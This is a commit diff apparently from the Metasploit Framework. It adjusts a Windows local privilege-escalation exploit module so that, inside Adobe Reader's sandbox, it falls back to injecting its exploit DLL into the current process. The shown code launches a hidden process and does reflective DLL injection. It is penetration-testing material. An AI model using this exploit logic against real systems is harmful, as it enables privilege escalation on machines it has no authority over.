Make it work with Reader Sandbox

2014-02-10 13:04:13 -06:00 · 2014-02-10 13:04:13 -06:00 · 2e130ce843
parent 0ac1acda70
commit 2e130ce843
1 changed files with 7 additions and 1 deletions
--- a/modules/exploits/windows/local/win32k_null_page.rb
+++ b/modules/exploits/windows/local/win32k_null_page.rb
@ -99,7 +99,13 @@ class Metasploit3 < Msf::Exploit::Local

    print_status("Launching notepad to host the exploit...")
    notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
+    begin
      process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
+    rescue Rex::Post::Meterpreter::RequestError
+      # Reader Sandbox won't allow to create a new process:
+      # stdapi_sys_process_execute: Operation failed: Access is denied.
+      process = client.sys.process.open
+    end
    print_good("Process #{process.pid} launched.")

    print_status("Reflectively injecting the exploit DLL into #{process.pid}...")